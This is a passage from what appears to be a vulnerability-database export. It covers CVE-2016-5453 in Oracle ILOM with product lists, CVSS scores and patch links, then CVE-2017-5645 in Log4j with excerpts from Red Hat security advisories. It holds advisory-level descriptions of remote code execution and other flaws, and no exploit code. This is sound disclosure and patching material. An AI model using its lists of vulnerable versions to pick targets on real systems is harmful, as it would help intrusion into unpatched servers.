infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: 
"application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", 
version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, { db: "NVD", id: "CVE-2016-5453", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003879", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, ], trust: 0.6, }, cve: "CVE-2016-5453", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2016-5453", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-94272", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", exploitabilityScore: 3.9, id: "CVE-2016-5453", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5453", trust: 1, value: "CRITICAL", }, { author: "NVD", id: "CVE-2016-5453", trust: 0.8, value: "Critical", }, { author: "CNNVD", id: "CNNVD-201607-817", trust: 0.6, value: "HIGH", }, { author: "VULHUB", id: "VHN-94272", trust: 0.1, value: "HIGH", }, { author: "VULMON", id: "CVE-2016-5453", trust: 0.1, value: "HIGH", }, ], }, ], 
sources: [ { db: "VULHUB", id: "VHN-94272", }, { db: "VULMON", id: "CVE-2016-5453", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, { db: "NVD", id: "CVE-2016-5453", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to IPMI. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications 
Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. 
\nThe vulnerability can be exploited over the 'IPMI' protocol. The 'IPMI' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation", sources: [ { db: "NVD", id: "CVE-2016-5453", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, { db: "VULHUB", id: "VHN-94272", }, { db: "VULMON", id: "CVE-2016-5453", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5453", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "92014", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003879", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-817", trust: 0.7, }, { db: "VULHUB", id: "VHN-94272", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5453", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94272", }, { db: "VULMON", id: "CVE-2016-5453", }, { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, { db: "NVD", id: "CVE-2016-5453", }, ], }, id: "VAR-201607-0661", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94272", }, ], trust: 0.01, }, last_update_date: "2024-11-23T19:56:10.085000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update 
Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63177", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5453", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5453", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/92014", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5453", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5453", }, { trust: 0.3, url: 
"http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94272", }, { db: "VULMON", id: "CVE-2016-5453", }, { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, { db: "NVD", id: "CVE-2016-5453", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94272", }, { db: "VULMON", id: "CVE-2016-5453", }, { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, { db: "NVD", id: "CVE-2016-5453", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94272", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5453", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92014", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003879", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-817", }, { date: "2016-07-21T10:15:09.397000", db: "NVD", id: "CVE-2016-5453", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: 
"VHN-94272", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5453", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92014", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003879", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-817", }, { date: "2024-11-21T02:54:20.817000", db: "NVD", id: "CVE-2016-5453", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In IPMI Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003879", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, ], trust: 0.6, }, }
var-201704-1589
Vulnerability from variot
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. Apache Log4j contains a vulnerability in the deserialization of untrusted data. An attack may result in information being obtained or altered, or in service operation being disrupted (DoS). Apache Log4j is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application. Failed exploits will result in denial-of-service conditions. Apache Log4j 2.0-alpha1 through 2.8.1 are vulnerable. Apache Log4j is a Java-based open source logging tool developed by the Apache Software Foundation. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.
This release of Red Hat JBoss Web Server 3.1 Service Pack 1 serves as a replacement for Red Hat JBoss Web Server 3.1, and includes bug fixes, which are documented in the Release Notes document linked to in the References. (CVE-2017-5645)
-
A vulnerability was discovered in tomcat's handling of pipelined requests when "Sendfile" was used. If sendfile processing completed quickly, it was possible for the Processor to be added to the processor cache twice. This could lead to invalid responses or information disclosure. (CVE-2017-5647)
-
A vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. (CVE-2017-5664)
-
A vulnerability was discovered in tomcat. When running an untrusted application under a SecurityManager it was possible, under some circumstances, for that application to retain references to the request or response objects and thereby access and/or modify information associated with another web application. (CVE-2017-5648)
-
Solution:
Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files). Bugs fixed (https://bugzilla.redhat.com/):
1441205 - CVE-2017-5647 tomcat: Incorrect handling of pipelined requests when send file was used 1441223 - CVE-2017-5648 tomcat: Calls to application listeners did not use the appropriate facade object 1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability 1459158 - CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism
- JIRA issues fixed (https://issues.jboss.org/):
JWS-657 - tomcat-native installs RHEL apr in addition to jbcs-httpd24-httpd-libs JWS-667 - Subject incorrectly removed from user session JWS-695 - tomcat7_t and tomcat8_t domains are in unconfined_domain JWS-709 - RPM missing selinux-policy dependency JWS-716 - Backport 60087 for Tomcat 8 JWS-717 - RFC 7230/3986 url requirement that prevents unencoded curly braces should be optional, since it breaks existing sites JWS-721 - CORS filter Vary header missing JWS-725 - /usr/share/tomcat7 needs world execute permissions to function on openshift v2 JWS-741 - Configurations in conf.d are not applied JWS-760 - [ASF BZ 59961] Provide an option to enable/disable processing of Class-Path entry in a jar's manifest file
- The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Security Fix(es):
-
bsh2: remote code execution via deserialization (CVE-2016-2510)
-
log4j: Socket receiver deserialization vulnerability (CVE-2017-5645)
-
uima: XML external entity expansion (XXE) can allow attackers to execute arbitrary code (CVE-2017-15691)
-
mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018) (CVE-2018-3258)
-
thrift: Improper Access Control grants access to files outside the webservers docroot path (CVE-2018-11798)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Installation instructions are available from the Fuse 7.3.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/
- Bugs fixed (https://bugzilla.redhat.com/):
1310647 - CVE-2016-2510 bsh2: remote code execution via deserialization 1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability 1572463 - CVE-2017-15691 uima: XML external entity expansion (XXE) can allow attackers to execute arbitrary code 1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018) 1667188 - CVE-2018-11798 thrift: Improper Access Control grants access to files outside the webservers docroot path
- Description:
Red Hat JBoss BPM Suite is a business rules and processes management system for the management, storage, creation, modification, and deployment of JBoss rules and BPMN2-compliant business processes. (CVE-2017-5645)
-
It was found that XStream contains a vulnerability that allows a maliciously crafted file to be parsed successfully, which could cause an application crash. The crash occurs if the file that is being fed into the XStream input stream contains an instance of the primitive type 'void'. An attacker could use this flaw to create a denial of service on the target system. (CVE-2017-7957)
It is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.
The References section of this erratum contains a download link (you must log in to download the update). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: log4j security update Advisory ID: RHSA-2017:2423-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2017:2423 Issue date: 2017-08-07 CVE Names: CVE-2017-5645 =====================================================================
- Summary:
An update for log4j is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch Red Hat Enterprise Linux Client Optional (v. 7) - noarch Red Hat Enterprise Linux ComputeNode (v. 7) - noarch Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch Red Hat Enterprise Linux Server (v. 7) - noarch Red Hat Enterprise Linux Server Optional (v. 7) - noarch Red Hat Enterprise Linux Workstation (v. 7) - noarch Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch
- Description:
Log4j is a tool to help the programmer output log statements to a variety of output targets. (CVE-2017-5645)
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability
- Package List:
Red Hat Enterprise Linux Client (v. 7):
